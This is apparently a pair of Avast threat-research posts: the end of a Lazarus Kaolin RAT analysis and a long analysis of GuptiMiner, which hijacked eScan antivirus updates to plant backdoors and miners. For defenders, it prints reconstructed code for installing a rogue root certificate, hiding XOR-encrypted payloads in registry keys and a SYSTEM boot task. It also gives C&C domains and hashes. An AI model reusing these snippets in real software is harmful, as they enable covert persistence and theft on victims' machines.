Although the exact method by which the Kaolin RAT sends gathered information to the C&C server is not precisely known, the presence of exported functions like "curl_global_cleanup" and "curl_global_init" suggests that the sending process again involves API calls from the curl library. 

For establishing communication, the Kaolin RAT begins by sending a POST request to the C&C server. In this first POST request, the malware constructs a URL containing the address of the C&C server. This URL generation algorithm is very similar to the one used in the RollMid loader. To the C&C address, the Kaolin RAT appends a randomly chosen word from the previously created dictionary (the same one as in the RollMid loader) along with a randomly generated string. The format of the URL is as follows: 

"%addressOfC&Cserver%?%RandomWordFromDictonary%=%RandomString%" 

The malware further populates the content of the POST request, utilizing the default "application/x-www-form-urlencoded" content type. The content of the POST request is subject to AES encryption and subsequently encoded with base64. 

Within the encrypted content, which is appended to the key-value tuples (see the form below), the following data is included (EncryptedContent)

  • Installation path of the RollFling loader and path to the binary blob 
  • Data from the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Iconservice 
  • Kaolin RAT process ID 
  • Product name and build number of the operating system. 
  • Addresses of C&C servers. 
  • Computer name 
  • Current directory 

In the POST request with the encrypted content, the malware appends information about the generated key and initialization vector necessary for decrypting data on the backend. This is achieved by creating key-value tuples, separated by “&” and “=” between the key and value. In this case, it takes the following form: 

%RandomWordFromDictonary%=%TEMP_DATA%&%RandomWordFromDictonary%=%IV%%KEY%&%RandomWordFromDictonary%=%EncryptedContent%&%RandomWordFromDictonary%=%EncryptedHostNameAndIPAddr% 

Upon successfully establishing communication with the C&C server, the Kaolin RAT becomes prepared to receive commands. The received data is encrypted with the aforementioned generated key and initialization vector and requires decryption and parsing to execute a specific command within the RAT. 

When the command is processed, the Kaolin RAT relays the results back to the C&C server, encrypted with the same AES key and IV. This encrypted message may include an error message, collected information, and the outcome of the executed function. 

The Kaolin RAT has the capability to execute a variety of commands, including: 

  • Updating the duration of the sleep interval. 
  • Listing files in a folder and gathering information about available disks. 
  • Updating, modifying, or deleting files. 
  • Changing a file’s last write timestamp. 
  • Listing currently active processes and their associated modules. 
  • Creating or terminating processes. 
  • Executing commands using the command line. 
  • Updating or retrieving the internal configuration. 
  • Uploading a file to the C&C server. 
  • Connecting to an arbitrary host. 
  • Compressing files. 
  • Downloading a DLL file from C&C server and loading it in memory, potentially executing one of the following exported functions: 
    • _DoMyFunc 
    • _DoMyFunc2 
    • _DoMyThread (executes a thread) 
    • _DoMyCommandWork 
  • Setting the current directory.

Conclusion

Our investigation has revealed that the Lazarus group targeted individuals through fabricated job offers and employed a sophisticated toolset to achieve better persistence while bypassing security products. Thanks to our robust telemetry, we were able to uncover almost the entire attack chain, thoroughly analyzing each stage. The Lazarus group’s level of technical sophistication was surprising and their approach to engaging with victims was equally troubling. It is evident that they invested significant resources in developing such a complex attack chain. What is certain is that Lazarus had to innovate continuously and allocate enormous resources to research various aspects of Windows mitigations and security products. Their ability to adapt and evolve poses a significant challenge to cybersecurity efforts. 

Indicators of Compromise (IoCs) 

ISO
b8a4c1792ce2ec15611932437a4a1a7e43b7c3783870afebf6eae043bcfade30 

RollFling
a3fe80540363ee2f1216ec3d01209d7c517f6e749004c91901494fb94852332b 

NLS files
01ca7070bbe4bfa6254886f8599d6ce9537bafcbab6663f1f41bfc43f2ee370e
7248d66dea78a73b9b80b528d7e9f53bae7a77bad974ededeeb16c33b14b9c56 

RollSling
e68ff1087c45a1711c3037dad427733ccb1211634d070b03cb3a3c7e836d210f
f47f78b5eef672e8e1bd0f26fb4aa699dec113d6225e2fcbd57129d6dada7def 

RollMid
9a4bc647c09775ed633c134643d18a0be8f37c21afa3c0f8adf41e038695643e 

Kaolin RAT
a75399f9492a8d2683d4406fa3e1320e84010b3affdff0b8f2444ac33ce3e690 

The post From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams appeared first on Avast Threat Labs.

GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining

23 April 2024 at 09:00

Key Points

  • Avast discovered and analyzed a malware campaign hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers
  • Avast disclosed the vulnerability to both eScan antivirus and India CERT. On 2023-07-31, eScan confirmed that the issue was fixed and successfully resolved
  • The campaign was orchestrated by a threat actor with possible ties to Kimsuky
  • Two different types of backdoors have been discovered, targeting large corporate networks
  • The final payload distributed by GuptiMiner was also XMRig

Introduction

We’ve been tracking a curious one here. GuptiMiner is a highly sophisticated threat that uses an interesting infection chain along with several notable techniques: performing DNS requests to the attacker’s DNS servers, performing sideloading, extracting payloads from innocent-looking images, and signing its payloads with a custom trusted root anchor certification authority, among others.

The main objective of GuptiMiner is to distribute backdoors within big corporate networks. We’ve encountered two different variants of these backdoors: The first is an enhanced build of PuTTY Link, providing SMB scanning of the local network and enabling lateral movement over the network to potentially vulnerable Windows 7 and Windows Server 2008 systems on the network. The second backdoor is multi-modular, accepting commands from the attacker to install more modules as well as focusing on scanning for stored private keys and cryptowallets on the local system.

Interestingly, GuptiMiner also distributes XMRig on the infected devices, which is a bit unexpected for such a thought-through operation.

The actors behind GuptiMiner have been exploiting a weakness in the update mechanism of Indian antivirus vendor eScan to distribute the malware by performing a man-in-the-middle attack. We disclosed this security vulnerability to both eScan and the India CERT and received confirmation on 2023-07-31 from eScan that the issue was fixed and successfully resolved.

GuptiMiner is a long-standing malware, with traces of it dating back to 2018, though it is likely even older. We have also found that GuptiMiner has possible ties to Kimsuky, a notorious North Korean APT group, based on similarities between the Kimsuky keylogger and parts of the GuptiMiner operation.
In this analysis, we cover GuptiMiner’s features and its evolution over time. We also note which samples contain or introduce particular features, to support overall comprehension across the vast range of IoCs.

It is also important to note that since users rarely install more than one AV on their machines, we may have limited visibility into GuptiMiner’s activity and its overall scope. Because of this, we might be looking only at the tip of the iceberg, and the true scope of the entire operation may still be subject to discovery.

Infection Chain

To illustrate the complexity of the whole infection, we’ve provided a flow chart containing all parts of the chain. Note that some of the used filenames and/or workflows can slightly vary depending on the specific version of GuptiMiner, but the flowchart below illustrates the overall process.

The whole process starts with eScan requesting an update from the update server, where an unknown MitM intercepts the download and swaps the update package with a malicious one. eScan then unpacks and loads the package, and a DLL is sideloaded by clean eScan binaries. This DLL enables the rest of the chain, followed by multiple shellcodes and intermediary PE loaders.

The resulting GuptiMiner infection runs XMRig on the infected machine and introduces backdoors which are activated when the malware is deployed in large corporate networks.

GuptiMiner’s infection chain

Evolution and Timelines

GuptiMiner has been active since at least 2018. Over the years, the developers behind it have improved the malware significantly, bringing new features to the table. We will describe the specific features in detail in respective subsections.

With that said, we also want to illustrate how the significant IoCs changed over time in a timeline representation, focusing on mutexes, PDBs, and used domains. These timelines were created by scanning for the IoCs over a large sample dataset, taking the first and last compilation timestamps of the samples, and then forming the intervals. Note that the scanned dataset is larger than the IoCs listed in the IoC section. For a more detailed list of IoCs, please visit our GitHub.

Domains in Time

In general, GuptiMiner uses the following types of domains during its operations: 

  • Malicious DNS – GuptiMiner hosts their own DNS servers for serving true destination domain addresses of C&C servers via DNS TXT responses 
  • Requested domains – Domains for which the malware queries the DNS servers for 
  • PNG download – Servers for downloading payloads in the form of PNG files. These PNG files are valid images (a logo of T-Mobile) that contain appended shellcodes at their end 
  • Config mining pool – GuptiMiner contains two different configurations of mining pools. One is hardcoded directly in the XMRig config which is denoted in this group 
  • Modified mining pool – GuptiMiner has the ability to modify the pre-defined mining pools which is denoted in this group 
  • Final C&C – Domains that are used in the last backdoor stage of GuptiMiner, providing additional malware capabilities in the backdoored systems 
  • Other – Domains serving different purposes, e.g., used in scripts 

Note that as the malware connects to the malicious DNS servers directly, the DNS protocol is completely separated from the legitimate DNS network. Thus, no legitimate DNS server will ever see the traffic from this malware. The DNS protocol is used here as a functional equivalent of telnet. Because of this, the technique is not DNS spoofing, since spoofing traditionally happens on the DNS network. 

Furthermore, the fact that the servers for which GuptiMiner asks for in the Requested domain category actually exist is purely a coincidence, or rather a network obfuscation to confuse network monitoring tools and analysts.

Timeline illustrating GuptiMiner’s usage of domains in time

From this timeline, it is apparent that the authors behind GuptiMiner realize that the correct setup of their DNS servers is crucial for the whole chain to work properly. Because of this, we can observe that the biggest rotation and the shortest timeframes are present in the Malicious DNS group. 

Furthermore, since domains in the Requested domain group are irrelevant (at least from the technical viewpoint), we can notice that the authors are reusing the same domain names for longer periods of time. 

Mutexes in Time 

Mutexes help ensure correct execution flow of a software and malware authors often use these named objects for the same purpose. Since 2018, GuptiMiner has changed its mutexes multiple times. Most significantly, we can notice a change since 2021 where the authors changed the mutexes to reflect the compilation/distribution dates of their new versions. 

Timeline illustrating GuptiMiner’s usage of mutexes in time

An attentive reader can likely observe two takeaways: The first is the apparent outliers in usage of MIVOD_6, SLDV15, SLDV13, and Global\Wed Jun  2 09:43:03 2021. According to our data, these mutexes were truly reused multiple times in different builds, creating larger timeframes than expected. 

Another point is the re-introduction of PROCESS_ mutex near the end of last year. At this time, the authors reintroduced the mutex with the string in UTF-16 encoding, which we noted separately.

PDBs in Time 

With regard to debugging symbols, the authors of GuptiMiner left multiple PDB paths in their binaries. Most of the time, they contain strings like MainWork, Projects, etc. 

Timeline illustrating PDBs contained in GuptiMiner in time

Stage 0 – Installation Process 

Intercepting the Updates

Everyone should update their software, right? Usually, the individual either downloads the new version manually from the official vendor’s site, or – preferably – the software itself performs the update automatically without much thought or action from the user. But what happens when someone is able to hijack this automatic process? 

Our investigation started as we began to observe some of our users were receiving unusual responses from otherwise legitimate requests, for example on: 

http://update3[.]mwti[.]net/pub/update/updll3.dlz

This is truly a legitimate URL to download the updll3.dlz file which is, under normal circumstances, a legitimate archive containing the update of the eScan antivirus. However, we started seeing suspicious behavior on some of our clients, originating exactly from URLs like this. 

What we uncovered was that the actors behind GuptiMiner were performing man-in-the-middle (MitM) to download an infected installer on the victim’s PC, instead of the update. Unfortunately, we currently don’t have information on how the MitM was performed. We assume that some kind of pre-infection had to be present on the victim’s device or their network, causing the MitM. 

Update Package

c3122448ae3b21ac2431d8fd523451ff25de7f6e399ff013d6fa6953a7998fa3
(version.dll, 2018-04-19 09:47:41 UTC)

Throughout the analysis, we will try to describe not just the flow of the infection chain, malware techniques, and functionalities of the stages, but we will also focus on different versions, describing how the malware authors developed and changed GuptiMiner over time.

The first GuptiMiner sample that we were able to find was compiled on Tuesday, 2018-04-19 09:47:41 and it was uploaded to VirusTotal the day after from India, followed by an upload from Germany:
c3122448ae3b21ac2431d8fd523451ff25de7f6e399ff013d6fa6953a7998fa3

This file was named C:\Program Files\eScan\VERSION.DLL which points out the target audience is truly eScan users and it comes from an update package downloaded by the AV. 

Even though this version lacked several features present in the newer samples, the installation process is still the same, as follows: 

  1. The eScan updater triggers the update 
  2. The downloaded package file is replaced with a malicious one on the wire because of a missing HTTPS encryption (MitM is performed) 
  3. A malicious package updll62.dlz is downloaded and unpacked by eScan updater 
  4. The contents of the package contain a malicious DLL (usually called version.dll) that is sideloaded by eScan. Because of the sideloading, the DLL runs with the same privileges as the source process – eScan – and it is loaded next time eScan runs, usually after a system restart 
  5. If a mutex is not present in the system (depends on the version, e.g. Mutex_ONLY_ME_V1), the malware searches for services.exe process and injects its next stage into the first one it can find 
  6. Cleanup is performed, removing the update package 

The malicious DLL contains additional functions which are not present in the clean one. Thankfully the names are very verbose, so no analysis was required for most of them. The list of the functions can be seen below.

Additional exported functions

Some functions, however, are unique. For example, the function X64Call provides Heaven’s gate, i.e., it is a helper function for running x64 code inside a 32-bit process on a 64-bit system. The malware needs this to be able to run the injected shellcode depending on the OS version and thus the bitness of the services.exe process. 

Heaven’s gate to run the shellcode in x64 environment when required

To keep the original eScan functionality intact, the malicious version.dll also needs to handle the original legacy version.dll functionality. This is done by forwarding all the exported functions from the original DLL. When a call of the legacy DLL function is identified, GuptiMiner resolves the original function and calls it afterwards. 

Resolving function that ensures all the original version.dll exports are available

Injected Shellcode in services.exe 

After the shellcode is injected into services.exe, it serves as a loader of the next stage. This is done by reading an embedded PE file in a plaintext form. 

Embedded PE file loaded by the shellcode

This PE file is loaded by standard means, but additionally, the shellcode destroys the PE’s DOS header, runs it by calling its entry point, and removes the embedded PE from its original memory location altogether. 

Command Line Manipulation 

Across the entire GuptiMiner infection chain, every shellcode which is loading and injecting PE files also manipulates the command line of the current process. This is done by manipulating the result of GetCommandLineA/W which changes the resulted command line displayed for example in Task Manager. 

Command line manipulation function

After inspecting this functionality, we believe it either doesn’t work as the authors intended or we don’t understand its usage. Long story short, the command line is changed in such a way that everything before the first --parameter is skipped, and this parameter is then appended to the process name. 

To illustrate this, we could take a command:
notepad.exe param1 --XX param2
which will be transformed into:
notepad.exeXX param2 

However, we have not seen a usage like power --shell.exe param1 param2 that would result in:
powershell.exe param1 param2
nor have we seen any concealment of parameters (like usernames and passwords for XMRig), a type of behavior we would anticipate when encountering something like this. In either case, this functionality obfuscates the command line’s appearance, which is worth mentioning. An interested reader can play around with the functionality at the awesome godbolt.org here. 
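The observed transformation can be reproduced with the following minimal sketch. This is our reimplementation of the behavior described above, not the malware’s own code.

#include <stdio.h>
#include <string.h>

// Reproduces: "notepad.exe param1 --XX param2"  ->  "notepad.exeXX param2"
// Everything before the first "--" is dropped, and whatever follows "--"
// is appended directly to the process name.
void FakeCommandLine(char *out, size_t outSize,
                     const char *processName, const char *commandLine)
{
    const char *marker = strstr(commandLine, "--");
    if (marker != NULL)
        snprintf(out, outSize, "%s%s", processName, marker + 2);  // skip the "--" itself
    else
        snprintf(out, outSize, "%s", commandLine);                // no marker: leave untouched
}

int main(void)
{
    char fake[256];
    FakeCommandLine(fake, sizeof(fake), "notepad.exe", "notepad.exe param1 --XX param2");
    printf("%s\n", fake);   // prints: notepad.exeXX param2
    return 0;
}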

Code Virtualization 

7a1554fe1c504786402d97edecc10c3aa12bd6b7b7b101cfc7a009ae88dd99c6
(version.dll, 2018-06-12 03:30:01) 

Another version with a mutex ONLY_ME_V3 introduced a code virtualization. This can be observed by an additional section in the PE file called .v_lizer. This section was also renamed a few times in later builds.

A new section with the virtualized code is called .v_lizer

Thankfully, the obfuscation is rather weak, given that the shellcode as well as the embedded PE file are still in plaintext form. 

Furthermore, the authors started to distinguish between the version.dll stage and the PE file loaded by the shellcode by using an additional mutex. Previously, both stages used the shared mutex ONLY_ME_Vx; now the sideloading uses MTX_V101 as a mutex.

Stage 0.9 – Installation Improvements

3515113e7127dc41fb34c447f35c143f1b33fd70913034742e44ee7a9dc5cc4c
(2021-03-28 14:41:07 UTC) 

The installation process has undergone multiple improvements over time, and, since it is rather different compared to older variants, we decided to describe it separately as an intermediary Stage 0.9. With these improvements, the authors introduced a usage of scheduled tasks, WMI events, two differently loaded next stages (Stage 1 – PNG loader), turning off Windows Defender, and installing crafted certificates to Windows. 

There are also multiple files dropped at this stage, enabling further sideloading by the malware. These files are clean and serve exclusively for sideloading purposes. The malicious DLLs that are being sideloaded are two PNG loaders (Stage 1): 

  • de48abe380bd84b5dc940743ad6727d0372f602a8871a4a0ae2a53b15e1b1739 *atiadlxx.dll 
  • e0dd8af1b70f47374b0714e3b368e20dbcfa45c6fe8f4a2e72314f4cd3ef16ee *BrLogAPI.dll 

WMI Events 

de48abe380bd84b5dc940743ad6727d0372f602a8871a4a0ae2a53b15e1b1739
(atiadlxx.dll, 2021-03-28 14:30:11 UTC) 

At this stage, WMI events are used for loading the first of the PNG loaders. This loader is extracted to a path:
C:\PROGRAMDATA\AMD\CNext\atiadlxx.dll 

Along with it, additional clean files are dropped, and they are used for sideloading, in either of these locations (can be both): 
C:\ProgramData\AMD\CNext\slsnotif.exe 
C:\ProgramData\AMD\CNext\msvcr120.dll

or
C:\Program Files (x86)\AMD\CNext\CCCSlim\slsnotify.exe
C:\Program Files (x86)\AMD\CNext\CCCSlim\msvcr120.dll 

The clean file slsnotify.exe is then registered via WMI event in such a way that it is executed when these conditions are met:

WMI conditions to trigger sideloading

In other words, the sideloading is performed on a workday in either January, July, or November. The numbers represented by %d are randomly selected values. The two possibilities for the hour are exactly two hours apart and fall within the range of 11–16 or 13–18 (inclusive). This conditioning further underlines the longevity of GuptiMiner operations.

Scheduled Tasks

e0dd8af1b70f47374b0714e3b368e20dbcfa45c6fe8f4a2e72314f4cd3ef16ee
(BrLogAPI.dll, 2021-03-28 14:10:27 UTC)

Similarly to the WMI events, GuptiMiner also drops a clean binary for sideloading at this location:
C:\ProgramData\Brother\Brmfl14c\BrRemPnP.exe 

The malicious PNG loader is then placed in one (or both) of these locations:
C:\Program Files (x86)\Brother\Brmfl14c\BrLogAPI.dll
C:\Program Files\Brother\Brmfl14c\BrLogAPI.dll 

The scheduled task is created by invoking the Task Scheduler. The scheduled task has these characteristics (an approximate command-line equivalent is shown after the list): 

  • It is created and named as C:\Windows\System32\Tasks\Microsoft\Windows\Brother\Brmfl14c 
  • Executes: C:\ProgramData\Brother\Brmfl14c\BrRemPnP.exe 
  • The execution is done under a folder containing the to-be-sideloaded DLL, e.g.: C:\Program Files (x86)\Brother\Brmfl14c\ 
  • The execution is performed with every boot (TASK_TRIGGER_BOOT) with SYSTEM privileges 
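For illustration, a roughly equivalent task could be registered with the built-in schtasks utility as shown below. This is our approximation: the malware invokes the Task Scheduler directly, and a one-liner like this cannot express the working-directory detail mentioned above.

schtasks /Create /TN "Microsoft\Windows\Brother\Brmfl14c" /TR "C:\ProgramData\Brother\Brmfl14c\BrRemPnP.exe" /SC ONSTART /RU SYSTEM /RL HIGHEST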

Deploy During Shutdown

3515113e7127dc41fb34c447f35c143f1b33fd70913034742e44ee7a9dc5cc4c
(2021-03-28 14:41:07 UTC)

Let’s now look at how all these files, clean and malicious, are being deployed. One of GuptiMiner’s tricks is that it drops the final payload, containing the PNG loader stage, only during the system shutdown process. Thus, this happens at a time when other applications are shutting down and potentially no longer protecting the user.

The main flow of the Stage 0.9 variant – drops final payload during system shutdown

From the code above, we can observe that the final payload DLL is dropped only when the SM_SHUTTINGDOWN metric is non-zero, meaning the current session is shutting down, and all the supporting clean files were dropped successfully. 

An engaged reader may also notice in the code above that the first function being called disables Windows Defender. This is done by standard means of modifying registry keys. Only if Defender is disabled can the malware proceed with the malicious actions. 

Adding Certificates to Windows

Most of the time, GuptiMiner uses self-signed binaries for their malicious activities. However, this time around, the attackers went a step further. In this case, both of the dropped PNG loader DLLs are signed with a custom trusted root anchor certification authority. This means that the signature is inherently untrusted since the attackers’ certification authority cannot be trusted by common verification processes in Windows. 

However, during the malware installation, GuptiMiner also adds a root certificate to Windows’ certificate store making this certification authority trusted. Thus, when such a signed file is executed, it is understood as correctly signed. This is done by using CertCreateCertificateContext, CertOpenStore, and CertAddCertificateContextToStore API functions.
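The API combination named above can be sketched as follows, assuming the certificate is already available as DER-encoded bytes (the malware stores it in plaintext in its binary, so a decoding step would precede this in practice). This is our reconstruction, not the decompiled routine shown in the figure below.

#include <windows.h>
#include <wincrypt.h>
#pragma comment(lib, "crypt32.lib")

// Sketch: install an attacker-controlled certificate as a trusted root authority.
// 'derBytes'/'derLen' are assumed to hold the DER-encoded certificate.
BOOL InstallRootCertificate(const BYTE *derBytes, DWORD derLen)
{
    PCCERT_CONTEXT ctx = CertCreateCertificateContext(
        X509_ASN_ENCODING | PKCS_7_ASN_ENCODING, derBytes, derLen);
    if (ctx == NULL)
        return FALSE;

    // Open the local machine's "ROOT" store, which holds trusted root CAs.
    HCERTSTORE store = CertOpenStore(CERT_STORE_PROV_SYSTEM_W, 0, 0,
                                     CERT_SYSTEM_STORE_LOCAL_MACHINE, L"ROOT");
    if (store == NULL) {
        CertFreeCertificateContext(ctx);
        return FALSE;
    }

    BOOL ok = CertAddCertificateContextToStore(store, ctx,
                                               CERT_STORE_ADD_REPLACE_EXISTING, NULL);

    CertCloseStore(store, 0);
    CertFreeCertificateContext(ctx);
    return ok;
}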

Function which adds GuptiMiner’s root certificate to Windows

The certificate is present in a plaintext form directly in the GuptiMiner binary file.

A certificate in the plaintext form which is added as root to Windows by the malware

During our research, we found three different certificate issuers used during the GuptiMiner operations: 

  • GTE Class 3 Certificate Authority 
  • VeriSign Class 3 Code Signing 2010 
  • DigiCert Assured ID Code Signing CA 

Note that these names are artificial and any resemblance to legitimate certification authorities shall be considered coincidental. 

Storing Payloads in Registry 

8e96d15864ec0cc6d3976d87e9e76e6eeccc23c551b22dcfacb60232773ec049
(upgradeshow.dll, 2023-11-23 16:41:34 UTC) 

At later development stages, the authors behind GuptiMiner started to integrate even better persistence for their payloads by storing them in registry keys. Furthermore, the payloads are encrypted by XOR using a fixed key, which ensures that the payloads look meaningless to the naked eye (a sketch of this scheme follows the list below). 

We’ve discovered these registry key locations to be utilized for storing the payloads so far: 

  • SYSTEM\CurrentControlSet\Control\Nls\Sorting\Ids\en-US 
  • SYSTEM\CurrentControlSet\Control\PnP\Pci\CardList 
  • SYSTEM\CurrentControlSet\Control\Wdf\DMCF 
  • SYSTEM\CurrentControlSet\Control\StorVSP\Parsers 
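A minimal sketch of this storage scheme follows. The XOR key and the registry value name below are placeholders of ours; only the use of a fixed XOR key and the key paths listed above come from the samples.

#include <windows.h>

// Sketch: XOR-encrypt a payload with a fixed key and store it under one of the
// registry keys listed above. The key bytes and value name are placeholders.
BOOL StorePayloadInRegistry(const BYTE *payload, DWORD size)
{
    static const BYTE xorKey[] = { 0x11, 0x22, 0x33, 0x44 };    // placeholder key

    BYTE *enc = (BYTE *)HeapAlloc(GetProcessHeap(), 0, size);
    if (enc == NULL)
        return FALSE;
    for (DWORD i = 0; i < size; i++)
        enc[i] = payload[i] ^ xorKey[i % sizeof(xorKey)];

    HKEY key;
    LONG rc = RegCreateKeyExA(HKEY_LOCAL_MACHINE,
                              "SYSTEM\\CurrentControlSet\\Control\\Wdf\\DMCF",
                              0, NULL, 0, KEY_SET_VALUE, NULL, &key, NULL);
    if (rc == ERROR_SUCCESS) {
        rc = RegSetValueExA(key, "Data", 0, REG_BINARY, enc, size);   // value name is ours
        RegCloseKey(key);
    }
    HeapFree(GetProcessHeap(), 0, enc);
    return rc == ERROR_SUCCESS;
}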

Stage 1 – PNG Loader 

ff884d4c01fccf08a916f1e7168080a2d740a62a774f18e64f377d23923b0297
(2018-04-19 09:45:25 UTC) 

When the entry point of the PE file is executed by the shellcode from Stage 0, the malware first creates a scheduled task to attempt to perform cleanup of the initial infection by removing updll62.dlz archive and version.dll library from the system. 

Furthermore, the PE serves as a dropper for additional stages by contacting an attacker’s malicious DNS server. This is done by sending a DNS request to the attacker’s DNS server, obtaining the TXT record with the response. The TXT response holds an encrypted URL domain of a real C&C server that should be requested for an additional payload. This payload is a valid PNG image file (a T-Mobile logo) which also holds a shellcode appended to its end. The shellcode is afterwards executed by the malware in a separate thread, providing further malware functionality as a next stage.

Note that since the DNS server itself is malicious, the requested domain name doesn’t really matter – or, in a more abstract way of thinking about this functionality, it can be rather viewed as a “password” which is passed to the server, deciding whether the DNS server should or shouldn’t provide the desired TXT answer carrying the instructions. 

As we already mentioned in the Domains timeline section, there are multiple of such “Requested domains” used. In the version referenced here, we can see these two being used: 

  • ext.peepzo[.]com 
  • crl.peepzo[.]com 

and the malicious DNS server address is in this case: 

  • ns1.peepzo[.]com 

Here we can see a captured DNS TXT response using Wireshark. Note that Transaction ID = 0x034b was left unchanged during all the years of GuptiMiner operations. We find this interesting because we would expect this could get easily flagged by firewalls or EDRs in the affected network.

DNS TXT response captured by Wireshark

The malware performs these queries at random intervals. The initial request for the DNS TXT record is performed within the first 20 minutes after the PNG loader is executed. The consecutive requests, which serve the malware’s update routine, wait up to 69 hours between attempts. 

This update mechanism is reflected by creating separate mutexes with the shellcode version number which is denoted by the first two bytes of the decrypted DNS TXT response (see below for the decryption process). This ensures that no shellcode with the same version is run twice on the system. 

Mutex is numbered by the shellcode’s version information

DNS TXT Record Decryption

After the DNS TXT record is received, GuptiMiner decodes the content using base64 and decrypts it with a combination of MD5 used as a key derivation function and the RC2 cipher for the decryption. Note that in the later versions of this malware, the authors improved the decryption process by also using checksums and additional decryption keys. 

For the key derivation function and the decryption process, the authors decided to use standard Windows CryptoAPI functions.

Typical use of standard Windows CryptoAPI functions

Interestingly, a keen eye can observe an oversight in this initialization process shown above, particularly in the CryptHashData function. The prototype of the CryptHashData API function is:

BOOL CryptHashData(
  [in] HCRYPTHASH hHash,
  [in] const BYTE *pbData,
  [in] DWORD      dwDataLen,
  [in] DWORD      dwFlags
); 

The second argument of this function is a pointer to an array of bytes of a length of dwDataLen. However, this malware provides the string L"POVO@1" in Unicode (UTF-16) format as *pbData, while the length passed corresponds to the narrow (ANSI) string.

Thus, the first six bytes read from this array are only db 'P', 0, 'O', 0, 'V', 0, which effectively cuts the key in half and pads it with zeroes. Even though the malware authors changed the decryption key throughout the years, they never fixed this oversight, and it is still present in the latest version of GuptiMiner. 
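A sketch of the derivation as we understand it, illustrating the oversight, follows. The key string "POVO@1" appears in this sample; the surrounding CryptoAPI calls are our reconstruction of typical usage, not disassembly.

#include <windows.h>
#include <wincrypt.h>
#include <string.h>
#pragma comment(lib, "advapi32.lib")

// Sketch: MD5 as key-derivation function + RC2 decryption via CryptoAPI,
// reproducing the half-key oversight described above.
BOOL DecryptTxtPayload(BYTE *data, DWORD *dataLen)
{
    HCRYPTPROV prov; HCRYPTHASH hash; HCRYPTKEY key;
    const wchar_t *password = L"POVO@1";

    if (!CryptAcquireContextW(&prov, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT))
        return FALSE;
    CryptCreateHash(prov, CALG_MD5, 0, 0, &hash);

    // Oversight: a UTF-16 string is hashed with the ANSI length (6), so only
    // the bytes 'P',0,'O',0,'V',0 ever reach the hash.
    CryptHashData(hash, (const BYTE *)password, (DWORD)strlen("POVO@1"), 0);

    CryptDeriveKey(prov, CALG_RC2, hash, 0, &key);
    BOOL ok = CryptDecrypt(key, 0, TRUE, 0, data, dataLen);

    CryptDestroyKey(key);
    CryptDestroyHash(hash);
    CryptReleaseContext(prov, 0);
    return ok;
}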

DNS TXT Record Parsing 

At this point, we would like to demonstrate the decrypted TXT record and how to parse it. In this example, while accessing the attacker’s malicious DNS server ns.srnmicro[.]net and the requested domain spf.microsoft[.]com, the server returned this DNS TXT response: 

VUBw2mOgagCILdD3qWwVMQFPUd0dPHO3MS/CwpL2bVESh9OnF/Pgs6mHPLktvph2

After fully decoding and decrypting this string, we get: 

This result contains multiple fields and can be interpreted as: 

  • Version: 1 
  • Version: 2 
  • Key size: \r (= 0xD) 
  • Key: Microsoft.com 
  • C&C URL: http://www.deanmiller[.]net/m/ 
  • Checksum: \xde

The first two bytes, Version 1 and Version 2, form the PNG shellcode version. It is not clear why there are two such versions, since Version 2 is never actually used by the program. Only Version 1 is considered when deciding whether to perform the update, i.e., whether to download and load the PNG shellcode or not. In either case, we could look at these numbers as a major version and a minor version, where only major releases trigger the update process.

The third byte is a key size that denotes how many bytes should be read afterwards, forming the key. Furthermore, no additional delimiter is needed between the key and the URL since the key size is known and the URL follows. Finally, the two-byte checksum can be verified by calculating a sum of all the bytes (modulo 0xFF). 
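A sketch of a parser for this layout is shown below. Field and structure names are ours, and the checksum handling is simplified to a single trailing byte (as in the \xde example above), summed modulo 0xFF as described.

#include <stdint.h>
#include <string.h>

// Sketch: parse the decrypted DNS TXT payload
//   [0] version1  [1] version2  [2] keySize  [3..3+keySize) key  [then] C&C URL  [end] checksum
typedef struct {
    uint8_t version1, version2;
    char    key[64];
    char    url[256];
} TxtRecord;

int ParseTxtRecord(const uint8_t *buf, size_t len, TxtRecord *out)
{
    if (len < 4) return 0;

    out->version1 = buf[0];
    out->version2 = buf[1];
    uint8_t keySize = buf[2];
    if ((size_t)3 + keySize >= len || keySize >= sizeof(out->key)) return 0;

    memcpy(out->key, buf + 3, keySize);
    out->key[keySize] = '\0';

    size_t urlLen = len - 3 - keySize - 1;              // everything up to the trailing checksum
    if (urlLen >= sizeof(out->url)) return 0;
    memcpy(out->url, buf + 3 + keySize, urlLen);
    out->url[urlLen] = '\0';

    uint8_t sum = 0;                                    // checksum: sum of preceding bytes mod 0xFF
    for (size_t i = 0; i + 1 < len; i++)
        sum = (uint8_t)((sum + buf[i]) % 0xFF);
    return sum == buf[len - 1];
}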

After the DNS TXT record is decoded and decrypted, the malware downloads the next stage, from the provided URL, in the form of a PNG file. This is done by using standard WinINet Windows API, where the User-Agent is set to contain the bitness of the currently running process.

The malware communicates the bitness of the running process to the C&C

The C&C server uses the User-Agent information for two things: 

  • Provides the next stage (a shellcode) in the correct bitness 
  • Filters any HTTP request that doesn’t contain this information as a protection mechanism 

Parsing the PNG File 

The downloaded file is a valid PNG file which also contains a shellcode appended at the end. The image is a T-Mobile logo and has exactly 805 bytes. These bytes are skipped by the malware and the rest of the file, starting at offset 0x325, is decrypted by RC2 using the key provided in the TXT response (derived using MD5). The reason for using an image as this “prefix” is to further obfuscate the network communication: the payload looks like a legitimate image, and the appended malware code is likely to be overlooked. 

PNG file containing the shellcode starting at 0x325

After the shellcode is loaded from position 0x325, it proceeds to load an additional PE loader from memory, which unpacks the next stage using Gzip. 

IP Address Masking

294b73d38b89ce66cfdefa04b1678edf1b74a9b7f50343d9036a5d549ade509a
(2023-11-09 14:19:45 UTC) 

In late 2023, the authors decided to ditch the years-long approach of using DNS TXT records for distributing payloads and they switched to IP address masking instead. 

This new approach consists of a few steps: 

  1. Obtain an IP address of a hardcoded server name registered to the attacker by standard means of using gethostbyname API function 
  2. For that server, two IP addresses are returned – the first is an IP address which is a masked address, and the second one denotes an available payload version and starts with 23.195. as the first two octets 
  3. If the version is newer than the current one, the masked IP address is de-masked and results in a real C&C IP address 
  4. The real C&C IP address is used along with a hardcoded constant string (used in a URL path) to download the PNG file containing the shellcode 

The de-masking process is done by XORing each octet of the IP address by 0xA, 0xB, 0xC, 0xD, respectively. The result is then taken, and a hardcoded constant string is added to the URL path. 

